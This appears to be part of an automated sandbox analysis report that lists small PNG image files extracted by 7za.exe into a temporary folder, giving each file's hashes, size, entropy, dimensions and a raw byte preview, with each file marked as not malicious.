      SHA-256:FDB31ACE2AB5F7835D424035568DB27D515F76B4CD8C12BF669EE15C105B87F0
      SHA-512:07AA20B06E2D78EDBD3371F2B042B6C59FEECD8B74C8962A8583820DA12207C66B85A44A7A3FDA1BF3536FA8DEA8618E877B2EA785D61D0B31D5BF45F9FE9136
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............l;....sRGB.........IDAT8....kNq..p...b...W........."b..R~.....#P.)BrA...&...).{F-..1.{.>...=g....y...=..9...YfZ..r.JC.r.z....L&.X~..P.*N..r..YT..lP..4s.R..v.@..4VR.z.3.u...P.L.d5...R`w..V.s.E.C.mS=|qA.w...f[..b.!........&N.o.K...l....cf.I.60..2..{x.M....OyN7...cOG[....Q(.lb.s."..H.M.1.....H'......z..e<.5...({..6H{'..f<jd..m6-.f.....?!^....1f.>.&v.1Z.._....l..iy...q3.Z.KMh0(.m;-<..].F.8.o......EM..V0.o;m.gr..x.M^.k.@++i$.b... n.o..K/.)....[....)L....;.G...(>Y.'..w..p..P."..G..i..V...xtVQG..H....._...G.....l..|..s.yT.].......o..n....vK...L....L.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):333
      Entropy (8bit):7.093323515601777
      Encrypted:false
      SSDEEP:
      MD5:38CFA7E0C40C3009B836577A3EE22D3F
      SHA1:7EAD88718F9F702A42D97B9264C2C03E2AC06634
      SHA-256:F00E0364E3E4DFA753C3170ACAD86470B577EFC8DE59C72BBB59A4DABA00861F
      SHA-512:9FFCBA31F7D88DBA8E40DDE50B35A43BF664E20EF337EFEEA18EC4A9D5FFD54C8E506FAC6C0D022232C7B768044682D16D88FA9A1BBA5477B197B0ACE4DD52E5
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............l;....sRGB.........IDAT8..1..A...b.-...T..H$...n.....!4..%!4.......d1.b..K........'...x.C......@.r......T.J.L....U.{.q...La.E.@..:..a.....N...Zj.U.:..U....|[.....8.:..^...]..'.G..h..<..u...O.".:.!.......^Y..G~...../.e.....0X.!|*.y.....+...p..D.77.m.b..wa.....j6BXR0..O]..7..I.!.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 19 x 18, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):355
      Entropy (8bit):7.111657201325465
      Encrypted:false
      SSDEEP:
      MD5:67D804DAF7F2089C6AA1623BE156E767
      SHA1:73663B739AF58CA0F4ED3832D7AB396E4704CD66
      SHA-256:E124F15E55EC121B6D43A165E9BD60FC3A5098DEE59B46BFDA69582E731DDFCC
      SHA-512:6775A229506C8F2F9E79A563EEB6B19A3C8AD024557781D94343589AFCA88E6EB5D500735C3704A7FCFF9EA9421AF01C2194D2E7111E6DFD55161DC8D95B7B46
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................i....pHYs...........~.....IDAT8..oq.0.....w.."....pP..:.:@.......@.p..}Y:.M..y.%....$.......f.CR...Y...tR.&.Q.tN....g}h.......hMn....tZ....K...&....._;..g;..F.s'.<,.FK....`L%........w..I.0Y.....O..x..}.:.]@.D)...^l]N...(.O.p7...1.3....t..i..F.lW.k...t9.....];5....-.y.`m.......a...-.-Y#h3..:fd..v...........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 19 x 20, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):329
      Entropy (8bit):7.082633768749197
      Encrypted:false
      SSDEEP:
      MD5:271FEBB3D82F76BEE72B1A9EE2262FAA
      SHA1:3E1021C5A28E420DE676A5747EA0A12A4A2E5C52
      SHA-256:956EEA1E1A0C2FDD2E768B9F537CB17EF021F438C1BCB287DF94DBE9B1A1D641
      SHA-512:387326A886B16A47C90E6E6945CE30FF076045EDD3EF0662BD9C11D189D8699AC2E5426C70AA15ABC0B725F9B0470E938AE9E92D36598308C9EAE18E7E786C53
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.............oU.t....pHYs...........~.....IDAT8.Tm..0.<0.:X%...0...s..I`.&....$...?oKW.....4-.K.}U$Q....... ..$K.....Q.)sf5r,..F..r..A...;_6-........@.V$..g!n3.Ql...{-i.5..4.^.b.m..3O7...36.8f...1(...|....1....E.S..6v.'ir.N..J...G..+......}....).....V..'..T.&..*B7...<...g>.6....m2c{../.9..........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):187
      Entropy (8bit):6.4474784170483455
      Encrypted:false
      SSDEEP:
      MD5:D5F2A455CFBDBEF0F9014F094D7C9BF5
      SHA1:236330604C03E4C505CFCE3E4C280C1D6AE2F234
      SHA-256:1264857EB21C69F81EEF40DF1F362E4D8B3315FFC68E9436658749050E8BD370
      SHA-512:F1620874BEF283FE5AB538D4A6CF412E3DDC8C8F10BDA7837602DCA042DCA7B5EFF6D9483D00CF5988786AC8A030112D6B55674D5CDFC068981C06227F07DB31
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............l;....sRGB........uIDAT8..RA.. ........H.....e.HlB@(%.)........r.w...<.....D.....g.y.|V ..G....~..F...&...?..Z.+b._...A..U.j]ab.z........8.I....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 7 x 12, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):172
      Entropy (8bit):6.054573838539015
      Encrypted:false
      SSDEEP:
      MD5:1B3FF2EB2E8AF3008EAB126AE390B832
      SHA1:C3F81BC4BB31BF2CFA7B4CC97945DB9278EA04BA
      SHA-256:9FA77E69F7900EE5E4BDAF6651DA0F63D06575EEE4BE04D2E101C9FE4E3C8CF6
      SHA-512:3202085895557D10D02432DA25CF5292215ACFC93B5B155DAAA11AE6284C073E412826F10A6A4F2FB8F013EA28EAA1D8386E9829DC55ECE2BE625CF3754DFDD1
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.....................pHYs...........~....^IDAT....1..@.D....$ ..HA.R...$..$.`(.K......f.MV.u.$[..e...j.=..(.pV.;.U..;VL^7%9...;...,.....hLE........IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 341 x 163, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):10438
      Entropy (8bit):7.930485474316313
      Encrypted:false
      SSDEEP:
      MD5:FAFD3D362556A1F9E8CDDBDAF26C5356
      SHA1:04797D778BA3FC7AD4CC4485C7070297F6EFB796
      SHA-256:EFA3DE8589B68A4CA83147ED77A67BC6AF449928368AAB0F740D81C11D78DD90
      SHA-512:3F532FA1677B50931FE98E9D0ADDB49C47784AE59A13415B3B91C05366C24C91A89F944A6675CA1FEAB123CC8D541739094BB25EA115372AC81233B1BBD9014B
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...U.........:.......sRGB.......(.IDATx........E.X.[$.\KP.Zk.-.Z.Km.R.. Jm...v.......R..(..J...rEH..AD....;s.;.;..~....9.y.{.gf.....v.....!...;.pN.....30.[..r..V...u.6...1P3.t..H,.c..H..Y..H.,..Oz.H...X....0`I.,.....T.P.O...S..p;....>..1P...TK..*.. !..=.l.Z.H..,....c|.s.x.q.... ..hM...0`I."47v#$....@...7...>...P'......p..l.!.W..-.&.e..0`I......./.....tO .K...HlN........@....Q@.U...ea..jYhml.$...n.......GR{...,....]..m^...bx.....L.XR.D.......wr.....X.....].6t.w....7...s.:ff.81`I.&3..$8=D:.,...DS.......v5.z....>...{U..9C.35......H......B,..?.v....g..R.8.......l_.f.......&e..j..x.n.....`..:.....X....s. P...K...AZ....a..j....{BB.....p..>.n.]F..c.$.vg..l).+..^M..\.XR.E[.W"....J..W.....Z.H..za{U.b{...Xb...\.XR.E[cW"i...J..+...i.x...F.%......8.(..k|..~i..[... ....HP....g.C...7..A........N.Z...1`I....Hfz.t6./..%[......X.......6..G9F.9B.*..%.z.[..0..n..Ima..m.T+.H.zj..]E.L.~R.S......f5>..C1@...~.T+2.@..4'...(..N......(.j..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 376 x 65, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):5793
      Entropy (8bit):7.9300273492408735
      Encrypted:false
      SSDEEP:
      MD5:ED623A69120325B464BC149BA5829465
      SHA1:17BA0CBE9A7297824D8792BECAE98D8853C56AF6
      SHA-256:A11AF07103005C27C0A5F721D99482E4700C21C85AFCBC8E44E4E785AF5FA902
      SHA-512:FC18CDE812CD2AC9E8F835971F4226092213737220E70E095BC5186042C061BF335501B098966C34A8C55610AFEA626061856740532166EA26C71C018B6059E7
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...x...A.......w....sRGB........8eXIfMM.*.......i...........................x...........A....hI......IDATx...u.....?<... t..+0S....S....T@.......t..*0SA....( 87..U....}.w.M..............%T..5.....o%.....D.".....>.Ch...8....:#......!@......9lF...C+..`o|_....D.".....h.7..n.'.;.+6j....8.^.y"E."........`'.....E..^M..w....W....D.".....tb5.=:..qJ.]........Q....D.".a..H..'.4...J..>M^.x_...2ZE."...W........'m_..../.9....-n7"........'......}...p.6j#.....+A..>..o..6`.....W.....N.MNK...........4"..0#.M9..A..LB5...9.;..}.....i..#...?.G.".a..u.qgN..q..[."xg..F.n..j.... G.`7..ug...3....c..O..g=.../(RG.G?.G-W..<.lr..X..MQ.?^.u..OI...?.l.=l......k'.0....+.!t......B9.?...!bR...}T..+..C..8...o.w...0...*...+....B.._M...2.e..|.-....?.~.?......}...kt.B........;..n*...g......jsX.~rQ...b9......J..'y=..[C...s.X.w........jI.6^..?..G...}sLr~+.....|....'x..'......]6<./....][........'...|*..+.-\..x.2.........<5..cL..../b......X.M.IVS..m.|.@<k.8W$V..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 144 x 135, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):2710
      Entropy (8bit):7.885504977078992
      Encrypted:false
      SSDEEP:
      MD5:7E13D3238251E675617FC57871E66B22
      SHA1:C8984ECCE68F3FEA507553E4FEC15042500A99E0
      SHA-256:C9A46222DC65D06CB881780AE1C7F78FFB425F2F6AF52029B66A0AF010A7B865
      SHA-512:E8DE83B61206DB9DDE107E4E6060E3879C3320C05A23560501405D4A1BF862425F3C197428B1D2FD8E403CA75B4A534E3D351761324DCFE3807633D80974546A
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR....................pHYs...........~....HIDATx...r.:..%.I.=...'m..:?......_.4...tf.....,!..;."6.p........}..N.!.../...4...S/X..."V....&.6.s...,.3.....:.L.........#.{..}.e#..Z"......08k.`.....b.....+..I4R..,..2a.x.g...........l>.....b..G.%.H..Z...3.!z..A...Lq..m..{ .@D.Gh..\..r.xYhk......+..f"SL&....""=Z.b`...,..l.i.+..%....D.#?1c...N8^. #..|.....[...%.,<@gN...Y..$c............. ..!....!.)>.wB..3...;.....G...........$..E~J..R{.....^.Y....Os.r.+".T....<......t..m.j..wl..sqz...o..Z{1a...a.........].\|.[.7>.........R.O.S'......@.r...g{U..TE.....#.i+R.....p.t...dw.x.\...".P..h&.CI....#.N..Q.."....$..;....>.B. ....f*.N.OV../2...\...|wx.C.J;.]..b.#...!j#?.)....+...G.1A....&.k(o.>..... ..|=J.UyRC.."+...@%..l!.e...U.....{..Z3..........MD._6...4.|.< *..j...h!_&..s1.k....k=..}.........2.IJ.......1W4...n`...C.....@.(.l.:.j.<.@.Q..Wss.....P...'...Rg.Zs..X...J`...DR..T...!..\...tn.f.@$...3'.%r. q..........7.W|...!.J=.4g(..C.....s..p...yV/~.....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 18 x 17, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):682
      Entropy (8bit):7.6389205166279055
      Encrypted:false
      SSDEEP:
      MD5:A87C23821DFBBB5BC861A21C5987E335
      SHA1:115461478FB9D6EC2567456613BDF4BE391AC9AE
      SHA-256:E8BDE3293B99CA7153ED9BF241E03351B9A3BADF7354EA259A29AAAF7B591245
      SHA-512:833D7DF71720BED7C41B23B638B484C4810ACB0D3211EB89F228B9957E1DE34BCBB3BFFBD48B5B0106E21AAD14ED5626FAFBA06A8C819617CA5B80B43BE84CDF
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............Z......sRGB........dIDAT8.}.M.RQ...=.IS... .iY......A..6.f.Z4. f..0.m.V.h.n.......H.........Z..F........s.p9..?.{.=.yU.&.J.r`0.\PU5<...+.....T..D"..?...T*er.\.p.9....../f.y.<C..v....x....r........z....F.F.....1n.......G.R.N.....i./...&...sT..v..X.G1.T....bm-.s..n.Z.P(.K..}.B|[.....N.Wl.....6.).....j........$r2..F..f3./..3.k..1..".1.....8.;q.....eO...r;c\.....!.f..c>...._.~...'.)0.W.~....D....,..~.m..."s...n.#YO&........Plk.......~............1..>.....&..*.'.G......L&.WH..N.....fv.Hr..ln..?...L`..h\.D".$..g.m..t./W..>.>.......$=.K..gq.$..^..V..v.a....."..J{..>..9.i...`.3X_.$."$<..%.....5..<.Mc...%U..SC......IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 42 x 42, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1163
      Entropy (8bit):7.810408266615424
      Encrypted:false
      SSDEEP:
      MD5:B0379F4EFD444C7E6F99BF38BD33F1B7
      SHA1:7C8BAA174439EEB5020450F85BA7E20FF3E43536
      SHA-256:8E46C25B51784B7E9D5018FB6FFF261B19A45557E6737D51A6965A8AD8B06F87
      SHA-512:2D0D315BF907EC692BACC79F1192686CCCBBE41DAC5CC75DB602B7B5D401A11B3B3E1C5BD012791920FB2B1D24B6CE36C979BB39126C508BA2BBD80E642F2115
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...*...*........[....sRGB........EIDATX..MO.Q....a.i........\.......D....wFJb".......?..^..n.F.m$...z.;s..tn.i.7zH{?.y.9.s..D......uOMdHQ.9N/.)r.W.T...").D.X....V.....ST..e.[,...P.....e..>.i.A.'/q....N......0......:xa...~m...w.[).....2.....9..SF.......w...8..at.x....D.?V..J.....P.<)<....O.D...>.t.(..m..W.~\....z-+.Fe8P/...vZ8s.z.....u....K..-..1..v.uhzr..d...d...)@.=...T..f.+(.....GM;.Oz7...[...k.K.5'O.j`.@....O....l..c"64<-./..........Uc;..Ml:6P..&.....>.v...4.Glh....e'......ol.q..........>......&... Pp9..F...-..!.... 1h..X....z\V..... .........U...5.V..)(n[Z[.$.M.....'.....+...M..J...<...h4...."..W......km.f..=.#7..U.......A.{.S.>...A.b~..c.R9.=.....z7N..<-#b.........9d.W...^.b.W.d.ZM.G..s.......m.ud\|....}....[.IQ..9Q...,gu..8..., .>.s...]...B.5..1&.(.....$.b....,'.....| aB..|..#..6<.'|F....#..........V.?..........|...}.Y:...9j....j....L....d{G...K.........6..7....W..CbJdP8.B..}..'...(%.7...j...Je..~...].I.@A.u...n..0.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 38 x 38, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1606
      Entropy (8bit):7.865689566821146
      Encrypted:false
      SSDEEP:
      MD5:57B59BAA0CA6BEC702E5248611AC3168
      SHA1:988EAAD18D7435F93AD60F7DBEA25062993FCBBC
      SHA-256:0FFECEE265B421290C84BAB7B106B724C8720EB8E69F79E85C0999E2F5AAA6F3
      SHA-512:1220F0EEF8146AC604425EE84BE5CB4C37EA455C8A9759F4E07F8D135FF657DA23E4C241D5E011DBBA19456087FE249DFFD061088967866C0555ED6BB3C278E4
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...&...&......=.....sRGB.........IDATX..XklTE...w_...l....4hXB...L.....L.. !......A4.....4.RbL......1.(1b.. B...[.....v..^......{..d..9s.....;{v..}...........3Y..<.....|M........q}..n.Z&.&.ti..XW2.4l/....F.....<.]r=.q"9....:.{w...rI. A..2.`[.+.(..3.>...(..B......X_.;.L.u.dhA.&8....Z..Y..........T....El.\..O.v|.........b..Q.j.E..vh..8?.v....^e..IQ3.'.;.a......ou...-.!(R..;.^D'.6..../..=G.D..i.3.x..m.|..Eo/.b-..I01.J.....k..-.DZ.7..7.i..{[z.u..9..t\.......9*IArv^v.....}...ZeE...........i.b..U=$S.M.t...D.._8.....:mK.........}.JU>. .U..r.......]..\_*..5......r.-5+.j.o?W=..RA....J..PY..ccd..a..[.b...|.oD..1T.BR.Z+.N\.|Sp...L.......b.@.&.=A..N..V.J.v=.x..%..,`*....D.kX6y..^ExL.-_.wB....B`.3...1.KhM*...GIM.TQ..4$.."....$fG..L,.F/..#..sF.>1p.c..I..k..B.,..'..[iI........b..J..e.$..k.....E..#.?.%....u.....d1...4.4An...8B.C.Rl!.1M<.C.YS.L....~..B..s...|.i........#.8&.I.+..J.....t_k...:.]#...M^..........}....cXp.......XD.Y,an`.S.h|.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):1284
      Entropy (8bit):7.798083378999992
      Encrypted:false
      SSDEEP:
      MD5:9B06A737F28B265084EBAA8D58237CBF
      SHA1:298D77F9BDC9002EFE1B87884D051695CD32176C
      SHA-256:DF6597BAD7CE5FF019A0CAB296B4933DBDB502AF4A59A813A4FE281E4DC562E1
      SHA-512:0DC37FD759FBBAB6D8C4EFF67F52E8F097043E826C9B8180449CE3309C60D770059F0C6225698EED1119A67EE08F79811C019B60552BFA7CC8922D1E3CF381B4
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR...$...$.............sRGB.........IDATX..X.KcW.6..6.3.A.....#tD.;...t.2;7...B...].....n....R...La. ...U.h41j.M.I..]..E_.&4.8...=.|.;.........ru..r...l.b7u`.....mtyy9.......}....F.b..[.T........g.EB.t.h..=..V.......";;;.....~xxx..d........6$.1..s8..c...D........y:.Nf...2qQO.C_..\.`,(cJ|..E.MVfff.R..GGG....z<..s..2.........2.d.sssw...\....{v...........f.n...a.|>_zOlGw...NNN.."!.L]]].d2..o.....f...#......J$;.t....o...3.b..=..o..%.....N`||<..J5...2.........O...c.B.....,....1...1..6<.g(B...F...B.^v7./1....lK..y'&&b~..I .,6W.A,b.I...a.....S.M..r..X.T.<..........y[......f......`....O.V.K.D.X)...23K....V....U....(..g....Q..AB...2}8.R`\...q..q.$5...........6..Y.AR.P......sS.5zB.<b...bZ.....I.[I$./..B..M.b....H.*....x.p........}...X....dH.iyee.....3v....|.........e.A.............7(..W.)\. S@... ..i+A.d.X.|..?00....].........1,,[..>#:K......?F.m....8.1.|A..al..X....d......t.....p...kd.s..2..f?cL+61.KX...N~qLc..O.v.S..--...<.Z;...}9.s...
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 128 x 24, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):2243
      Entropy (8bit):7.890599449773341
      Encrypted:false
      SSDEEP:
      MD5:D677BE21C17F249787499AA5496C19C9
      SHA1:C08040EF141DFAE4F5E7093F3D349B4F3147087F
      SHA-256:B21635661B35474CDE558EFFC9A839679F3D674F26FBA9CA3A3BFA15B1B0BAA0
      SHA-512:A4C0E02C598C4EEB33B975CFAD614967C52AFE4DBAC9D9FE8888B240A3C4CFF55C5976B7EA8E480AC23AB55B221BEE40D3F50561D4074D13BC745C03EE0293A7
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............ib.....tEXtSoftware.Adobe ImageReadyq.e<...eIDATx..Y.SSW...{.";a1....m..Zm..S...S[;.~.v.i?T@6.....B.!...{..w..A..F.....]....;.>...B.).=.OEp..w....*.S... ..(.P..v..WYVK....555.:^2.X.,...7,w.....n..../M.i.d+ry..`x...=.f..]..@....(.N.S..J.1r....*{....B..Q....X,.....|.z..L& ....H.3.......%}..t......./...u.8../XjO1<o..wb;'..%s.O.b........A...)....^0.....b.Z+++............Jh-.;0...5..%:'..!.b.....nw....0........pX...,..ho'....;.}..%.^/I......a....}}}V.M..$...k4...A................*.Y.f.E.X..Fk4..Z....l.0mx.N.;...O.9....v....D&.....Kh...1...f+].L..d..F..&.vS..*R..hd3208......g...*.D..P(......N..k...L%. C.L...[.......~..@ .Y===$.....G...T,...x>...|Y}.....!I%+uS]O....|.?~.X.l...QtJ....SB...r.,..;..;.!b3..V.I.Mf....tI2.N.s...Q.'''..;.~...W....6.....N..Vd|||-..i..t...a0};...[-.6.9.^...l$.....C....s9...I..y..PJ.y...~...o.....;..8.,@(..!.....e.P..|..&.I%.'q$.Bi4...<.M.,.A.@....... ...(*..........BT...C....V.....K..ts..@?..U...Ey....kPI*
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 128 x 24, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):2596
      Entropy (8bit):7.908959443778825
      Encrypted:false
      SSDEEP:
      MD5:6E89C78AF818A60ED47EE3875705ED45
      SHA1:FC6B97C4BE35AEA4DC32ED37141DA92B746D473F
      SHA-256:B24DD9F1A7F47F22B0313D38A600C7460DE50275C895A3401D5E44E3A95C7D02
      SHA-512:47C402B3CCC162C5E74EB0B14F91E65BCA38D99C8AFE9805AFC1A140F6BDCDF9BED6DF7C7ABA5369A763E49C37F5F3F53C70233452719165C48A7A1BD248C1D3
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............ib.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....T..uw.3....?.."?5.Q.-*.lLT,..j..Mm..MO....R[k.$..iHm..(*.$."j.."."..e...;.;3;.;3.2hlJ.zN..w.s.}w...f.w4j.X{r..S.....0.\...8...e6&.....n...b...3Z.....7.6...Y.....M...|...."|..Buo.{...R.....q.........D.k%.p....+...nf.|z...x......q.^Q\6..;,.bDp o....=h. 1mT._}W...K.-.C..m...">B..cs.x.8.o.A7..t..r......*P..$v..3...9..d...|K.8e...H..R[3...S..[....|...J....MH..;.%:.c..$97v|~r......K......7~B|`0P..j.qi.d.....u}]..].+.R.....H(HR.Tt.m.9/._.<..~.X$xc.3...7.[*..C#....z+....h.w:.f..tz...?_1*.....iN..p."........J.......m&}.fe'~.\.b..&.{.O+..ZF`....S?.Bt{..fi.....3]...j.6.....{.....N....I.f........j5.+E(.~P.....M....)+...%..t.....E........Ss.F..s'.+~l-.0.%..'....0.{.`%w.[.u./...............`..(.TC..d.V.H... ..T...0..$e...)^.......^......0....(.9\.Z.`....|..2.4;.JTb..].J...N. &au.....J....r..H8....^..D...Y.y'.G.<..5i.G.k.w.O..>.R...8#:.2.I}.=M ...u.p.1.u............'42\..0...q.X.0.@
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 12 x 19, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):229
      Entropy (8bit):6.583568512749849
      Encrypted:false
      SSDEEP:
      MD5:D7F1A033D0C5A3A62FF74CB7A04248A8
      SHA1:8DA3E468724D47365701CE8852A9DD45F45AB9C8
      SHA-256:07911D525EB39E2883310695DF01CB0765617196A7B6821A9997DB18418B1EA3
      SHA-512:D722FB728779F8039E4DC00D3C1770194703CAF789DFC3AE61A680961DA715A3690E532570FB491EB873BB59989FC3CC6E73055F064969764CC6E3BB577AD4EB
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR....................pHYs...%...%.IR$.....IDAT(.....0...D...)]f....2N..1\.T.)"..aJ..B|..$.I.../>......u!.v.6..n!...,d.MC...d'=..k..`.....(......}...{...6.f....C...5.....)......IH.%=%.....#.Y{...@....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 1270 x 244, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):17429
      Entropy (8bit):7.595639113543587
      Encrypted:false
      SSDEEP:
      MD5:2A2AA071FFBBF63270A7B09644FABF50
      SHA1:ED7871B544968EAEA10A718F87E0771A2AF55399
      SHA-256:595FB0871DDB4E74D80495BD7137CCE061939F3EFCF19E7408FB727CAEEC434E
      SHA-512:251F1DC5ADF0BDAD99F8806016A8229BB19E6789DEAA1C3F372A39BDA053900855223FC7A94F51F412DA693160E143BCB53B9482D834FCE5C3E10FEA183A98DB
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR................A....sRGB.......@.IDATx.....dW}..s........$...x@0.CL.m.WyI.0.......q..g>{..vb'3...g.3z._...4....x#"..*.......a..nI..Ww..uW.U.Wo.W..~..{.g....z.w.=U.M....dN."5#.......b#@....... @........7.j.:..+...%....v..#.H.E:R8........ @....... @`....F..k9...H[WX.Q..Hy&........ @....... @`.....d.\.....a..}.D.3..Wq..... @....... @....C........}J...5.?...t...5..4.... @....... @...M....$.Mhfg.qi.vN.>.k6_.<.......0..... @....... @....V...!wS.+....<..K..s..m....y..<....:.s##........ @....... @.....FG.......I....u.....t....K.................O....... @....... 0:..n......J...J.."s..n..m.y1..l... @....... @....#* .7..f...3.:...m...o..G.R.=..&@....... @........l....l.....P.#..RV..7?....R..... 0..u]....H.~].?I;..;....i#@....."..P...`..c+...Q.?.'.......... @..P.:.9C.F.-....E1.n........\......!?...L......n.B.-/..t....>..I..1. @.......|.J..=>R..e.......S?+^....D..%|g........G....q..VK.%._4V../#g....RS8E...c#P5....j.o;h......L......;.s"-....8~i...P
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 22 x 34, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):726
      Entropy (8bit):7.645554143399002
      Encrypted:false
      SSDEEP:
      MD5:D3750998650383EC862991D49BF85F1A
      SHA1:DA750AF87639194D44C3268A1156F8A3026856D7
      SHA-256:FFB3F935F6C8ABE28F629C1E6CD1B616B19706652FA428D4E20BCAE2AB422F11
      SHA-512:D4202683CF8BD1C796860F86C74419E082D8962369BFC0C8B38B74B57465B750A9107E4F81F097F4C667E85BBEAF9CDED6613FCA004CF4C52A30564D6F7125E7
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR.......".....[_).....sRGB.........IDATH....k.A..3..6.-...K..8.........P<.x.....kO.'....@.b..@......\./...n......2.vfw....7.}.._a...^._...k.1}<..bG....WB.(.Z..t4.......`..*....F.q...,....L&.j.".8...K..C.^)..O=(...2.9...acE.7.......n/..n..W<....n.Z.L.,.|S.6..'.B.gBb.u....X..........>@.[.|....Yi6.g-....g...d...l..M..TL..).-#.G2(....j.z..YE.o;..5!_..'...i..C...q.<...h^d.A?.. ...........@wS...\..Gd3...}-.....S...6.#..../.B.....Ujj..Q....6S&Xh.-..)..a`..;.o..c.|...........U.....6..qG...t.....tW..q.N..a..7.....Ng...D/...NA.f.. ...Y..>.&....p..1.o.+.R.S..]oz...P.W...K...@..u..t.m...X.7J`.a.w.@O....`x.....|....@.I...N$.....0I...S..y?...|>8rk#......(...B....../.S.W7.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 24 x 32, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):833
      Entropy (8bit):7.678008447995158
      Encrypted:false
      SSDEEP:
      MD5:3CEC77408330357109C29E8E44416408
      SHA1:2F9C10453D03A3A6B8B2AE4C73E9D2699625672D
      SHA-256:A386FE95AD0B4FCFC28CDDC32BB592B3A9EA9D6CCE05F88184C1540095AFF094
      SHA-512:D8B215E991D6E74AA9F3DEC0CA616FDC591DA86E389DE422E5BC6FBE1DD46E52F026E0CB5B1D343E3362FA4CDC5206DEB6BC439EE0AEEBD66FE80A8F6D12ACC5
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR....... ......^.8....sRGB.........IDATH....k.A....[m,.I..SA..cI.(H.... Xz.....*.Az..=TD.i...i.`!B)TQl...1.....f...,Lf...~.......'.......*......F ..QO...P*.:........~U......w.w.H$.. ..]..m!+.\.Y|......_...2...B....A.).gha.=U..`....7..hy....2n....G.N8.7.EhE#..Xx]Q...E.%..n.e.v...2...I.Z& .--......=.4z..0..z.e|l...z..`k.....3.....^..o.+ ..[.`......g....|,....]+....*'A..h.6...K&F..X'.2....<..-+P....x.+y..+...I9.....BN...$$.r.>.a}p.-.......|>.I>......%.g...}.....B$...u...;\..g.*.b.]..0'T}w.T..$.H..6...Z.$y.H.....+...z....N...O..)QML..\..o..8...2..v..G1.....$.yI.1...d...>...y..NE.L..@oo...5.C...N=.E8F.z7U.$0...E."._ND6.M..x.._# ..C^.(.;.Nc..$v.......O&.G8..8n.k",...<.............r{....1.....:::.C..........j.....`.2....%.61v}]...N..p'=.d~....H.. .'.]5e.....IEND.B`.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:PNG image data, 16 x 42, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):650
      Entropy (8bit):7.556208407174459
      Encrypted:false
      SSDEEP:
      MD5:3C23DA913969DA5D35ED8F37C976025E
      SHA1:F9FE4E178DFF49E5596D2041047F8F3140C54D1F
      SHA-256:C15BCB5084529086D9AD3165D3E04AFA43A937D224747FB3194D731FBBEA7A27
      SHA-512:CF098D31CA2D2BBC6AFBEEB376170887AA65A09AA90395A2C610AEF4F14A0AAC84DCA5EBCB082F4D3030D0543A516BEBE903523203F9CB26DC55CC484926A50C
      Malicious:false
      Reputation:low
